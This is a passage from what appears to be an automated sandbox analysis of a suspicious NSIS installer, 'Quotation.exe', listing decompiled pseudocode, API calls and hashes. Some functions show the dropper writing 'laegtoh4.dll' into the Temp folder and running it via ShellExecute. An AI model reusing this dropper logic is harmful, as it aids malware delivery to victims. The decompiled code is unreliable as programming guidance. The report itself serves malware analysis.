					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                0x00403e3c
                                                0x00403ed0
                                                0x00000000
                                                0x00403ed0
                                                0x00403e4d
                                                0x00403e51
                                                0x00000000
                                                0x00000000
                                                0x00403e57
                                                0x00403e60
                                                0x00403e63
                                                0x00403e63
                                                0x00403e69
                                                0x00403e6f
                                                0x00403e6f
                                                0x00403e7b
                                                0x00403e81
                                                0x00403e88
                                                0x00403e8b
                                                0x00403e8e
                                                0x00403e90
                                                0x00403e90
                                                0x00403e98
                                                0x00403e9e
                                                0x00403e9e
                                                0x00403ea8
                                                0x00403ead
                                                0x00403eb0
                                                0x00403eb5
                                                0x00403eb8
                                                0x00403eb8
                                                0x00403ec8
                                                0x00403ec8
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                • Instruction ID: f5966fbedea87c62c799fd74794a37596286a0d285d836841829b5ba7487bb7a
                                                • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                • Instruction Fuzzy Hash: 2C215771904744ABC7219F78DD08B5B7FF8AF01715F048A69E855E26D0D738F904CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404D7E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00404D7E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059FD(0, _t39, 0x42a080, 0x42a080, _a4);
					}
					_t26 = lstrlenA(0x42a080);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a080);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x42a080;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a080)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a080, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                0x00404d84
                                                0x00404d90
                                                0x00404d93
                                                0x00404d99
                                                0x00404da5
                                                0x00404da8
                                                0x00404dab
                                                0x00404db1
                                                0x00404db1
                                                0x00404db7
                                                0x00404dbf
                                                0x00404dc2
                                                0x00404ddf
                                                0x00404de3
                                                0x00404dec
                                                0x00404dec
                                                0x00404df6
                                                0x00404dff
                                                0x00404e0b
                                                0x00404e12
                                                0x00404e16
                                                0x00404e19
                                                0x00404e2c
                                                0x00404e3a
                                                0x00404e3a
                                                0x00404e3e
                                                0x00404e40
                                                0x00404e43
                                                0x00000000
                                                0x00404e43
                                                0x00404dc4
                                                0x00404dcc
                                                0x00404dd4
                                                0x00404dda
                                                0x00000000
                                                0x00404dda
                                                0x00404dd4
                                                0x00404dc2
                                                0x00404e4d

                                                APIs
                                                • lstrlenA.KERNEL32(0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                • lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                • lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,7519EA30), ref: 00404DDA
                                                • SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                • SendMessageA.USER32 ref: 00404E12
                                                • SendMessageA.USER32 ref: 00404E2C
                                                • SendMessageA.USER32 ref: 00404E3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 51f607469ab4337939dc402639e762edda63f0e7dd75a043e6aaa412e3dde4ad
                                                • Instruction ID: 9e4846259fdc63e4b0011bd9da19de3f15789c7d3b7aeff175938ec3064a1f56
                                                • Opcode Fuzzy Hash: 51f607469ab4337939dc402639e762edda63f0e7dd75a043e6aaa412e3dde4ad
                                                • Instruction Fuzzy Hash: B9218EB1900118BBDB119FA5CC84ADFBFA9EF44354F04807AFA04B6291C7398E40DB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059DB(0x40a040,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a040, 0x40901c);
					lstrcatA(0x40a040,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405CB0( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405723( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                                0x00401674
                                                0x00401684
                                                0x00401688
                                                0x00401690
                                                0x004016a7
                                                0x004016af
                                                0x004016b8
                                                0x004016b8
                                                0x004016cb
                                                0x004016d7
                                                0x004026da
                                                0x004016ed
                                                0x004016f3
                                                0x004016f8
                                                0x00000000
                                                0x004016f8
                                                0x004016cd
                                                0x004016cd
                                                0x004021e8
                                                0x004021e8
                                                0x004021e8
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                  • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,ACID Setup,NSIS Error), ref: 004059E8
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,?,000000DF,000000D0), ref: 00401690
                                                • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,?,000000DF,000000D0), ref: 0040169A
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,?,000000DF,000000D0), ref: 004016AF
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,?,000000DF,000000D0), ref: 004016B8
                                                  • Part of subcall function 00405CB0: SetErrorMode.KERNELBASE(00008001,00000000,0042BCA8,C:\Users\user\AppData\Local\Temp\,0040560B,0042BCA8,0042BCA8,00000000,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\Quotation.exe" ), ref: 00405CBE
                                                  • Part of subcall function 00405CB0: FindFirstFileA.KERNELBASE(?,0042C8F0), ref: 00405CCA
                                                  • Part of subcall function 00405CB0: SetErrorMode.KERNELBASE(00000000), ref: 00405CD4
                                                  • Part of subcall function 00405CB0: FindClose.KERNELBASE(00000000), ref: 00405CDC
                                                  • Part of subcall function 00405723: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405778
                                                  • Part of subcall function 00405723: GetShortPathNameA.KERNEL32 ref: 00405781
                                                  • Part of subcall function 00405723: GetShortPathNameA.KERNEL32 ref: 0040579E
                                                  • Part of subcall function 00405723: wsprintfA.USER32 ref: 004057BC
                                                  • Part of subcall function 00405723: GetWindowsDirectoryA.KERNEL32(0042C4A8,000003F0,?,?,00000000,000000F1,?), ref: 004057CD
                                                  • Part of subcall function 00405723: lstrcatA.KERNEL32(0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D9
                                                  • Part of subcall function 00405723: CreateFileA.KERNEL32(0042C4A8,C0000000,00000000,00000000,00000004,08000080,00000000,0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057F0
                                                  • Part of subcall function 00405723: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 00405804
                                                  • Part of subcall function 00405723: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405813
                                                  • Part of subcall function 00405723: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405829
                                                • MoveFileA.KERNEL32 ref: 004016C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll
                                                • API String ID: 2621199633-160834357
                                                • Opcode ID: 39be9a3ed13df2c1dc0a7def94e95ebcbb8ca7a0b25094b5a643ed618163fea6
                                                • Instruction ID: 9f433403dff5527e04f0e9ab7737a20a855248c0a7a5ae3549be26796f1196a1
                                                • Opcode Fuzzy Hash: 39be9a3ed13df2c1dc0a7def94e95ebcbb8ca7a0b25094b5a643ed618163fea6
                                                • Instruction Fuzzy Hash: 5A117072904215FBCF016FA2CD4999E7A61EF103A8F10423BF501751E1DA7D8A91AF9E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404643, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404643(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                0x00404651
                                                0x0040465e
                                                0x00404664
                                                0x004046a2
                                                0x004046a2
                                                0x004046b1
                                                0x004046b8
                                                0x00000000
                                                0x004046ba
                                                0x00404666
                                                0x00404675
                                                0x0040467d
                                                0x00404680
                                                0x00404692
                                                0x00404698
                                                0x0040469f
                                                0x00000000
                                                0x0040469f
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                • Instruction ID: c161ae2f8e6b182b0fd34984c2a0c6d9d452551e98057f29495dc0983078c510
                                                • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                • Instruction Fuzzy Hash: A7019E71D00218BADB00DBA4CC81BFFBBBCAB45711F10412BBB00F62C0D3B8A9418BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b048 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x414c50; // 0x37aff
					_t7 =  *0x428c58; // 0x37b03
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x414c10,  *0x40b048, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x414c10);
					SetDlgItemTextA(_t16, 0x406, 0x414c10);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                                0x00402bb7
                                                0x00402bbf
                                                0x00402bcb
                                                0x00402bd4
                                                0x00402bd7
                                                0x00402bd7
                                                0x00402bdf
                                                0x00402be1
                                                0x00402be7
                                                0x00402bee
                                                0x00402bf0
                                                0x00402bf0
                                                0x00402c09
                                                0x00402c14
                                                0x00402c21
                                                0x00402c29
                                                0x00402c29
                                                0x00402c34

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                • MulDiv.KERNEL32(00037AFF,00000064,00037B03), ref: 00402BF6
                                                • wsprintfA.USER32 ref: 00402C09
                                                • SetWindowTextA.USER32(?,00414C10), ref: 00402C14
                                                • SetDlgItemTextA.USER32 ref: 00402C21
                                                • ShowWindow.USER32(?,00000005,?,00000406,00414C10), ref: 00402C29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: TextWindow$ItemShowTimerwsprintf
                                                • String ID:
                                                • API String ID: 559026099-0
                                                • Opcode ID: 1bf024436dbc0d01cb52e4f76fdb7ff34a3bb134a71d5a22670ee3ec0b6572fb
                                                • Instruction ID: da11a6cf77eab8a7fe7ea890cfaf0f22c23191f336b5e04c96ce70fa4cb2a612
                                                • Opcode Fuzzy Hash: 1bf024436dbc0d01cb52e4f76fdb7ff34a3bb134a71d5a22670ee3ec0b6572fb
                                                • Instruction Fuzzy Hash: 7501B570600214ABD7215F15AD09FEF3B68EB45721F00843AFA05BA2D0DBB864509BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\alfons\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                                0x00401e3c
                                                0x00401e45
                                                0x00401e47
                                                0x00401e4c
                                                0x00401e4d
                                                0x00401e58
                                                0x00401e5a
                                                0x00401e65
                                                0x00401e71
                                                0x00401e7f
                                                0x00401e91
                                                0x004026da
                                                0x004026da
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • wsprintfA.USER32 ref: 00401E5A
                                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll, xrefs: 00401E53
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                • %s %s, xrefs: 00401E4E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ExecuteShellwsprintf
                                                • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll
                                                • API String ID: 2956387742-2601188364
                                                • Opcode ID: 325ce4e6db7db2d43a24a0a054918743e22d24fe983c8af644ce1b1221345b66
                                                • Instruction ID: d9aa26d169122715fb4d9242c6ec18ca088ab24489bb6374a4c731177bc8625c
                                                • Opcode Fuzzy Hash: 325ce4e6db7db2d43a24a0a054918743e22d24fe983c8af644ce1b1221345b66
                                                • Instruction Fuzzy Hash: 90F0F471B04200AEC711ABB59D4AF6E3AA8DB11319F200837F001F61D3D5BD88519768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                                0x00402af5
                                                0x00402afd
                                                0x00402b25
                                                0x00402b0f
                                                0x00402b56
                                                0x00000000
                                                0x00402b5e
                                                0x00402b23
                                                0x00000000
                                                0x00000000
                                                0x00402b23
                                                0x00402b3a
                                                0x00000000
                                                0x00402b46
                                                0x00402b50

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                • Opcode Fuzzy Hash: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                0x00401d3e
                                                0x00401d45
                                                0x00401d74
                                                0x00401d7c
                                                0x00401d83
                                                0x00401d83
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 5da6e5cd00a1277bc603e5448242defb56d1d49a981dc3d01ba33d8312d7bfb7
                                                • Instruction ID: 273f5d2522af92408d9d707f912642cc01ca42a216635a10685a7a38cf896988
                                                • Opcode Fuzzy Hash: 5da6e5cd00a1277bc603e5448242defb56d1d49a981dc3d01ba33d8312d7bfb7
                                                • Instruction Fuzzy Hash: 78F0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105476F601F2191C7789D418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040557B, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040557B(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405331
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405513(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                0x00405584
                                                0x00405584
                                                0x0040558b
                                                0x0040558e
                                                0x00405593
                                                0x004055a6
                                                0x004055c0
                                                0x00000000
                                                0x004055c0
                                                0x004055aa
                                                0x004055ab
                                                0x004055ae
                                                0x004055af
                                                0x004055b7
                                                0x00000000
                                                0x00000000
                                                0x004055b9
                                                0x004055bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004055bc
                                                0x00000000
                                                0x0040559c
                                                0x00000000
                                                0x0040559d

                                                APIs
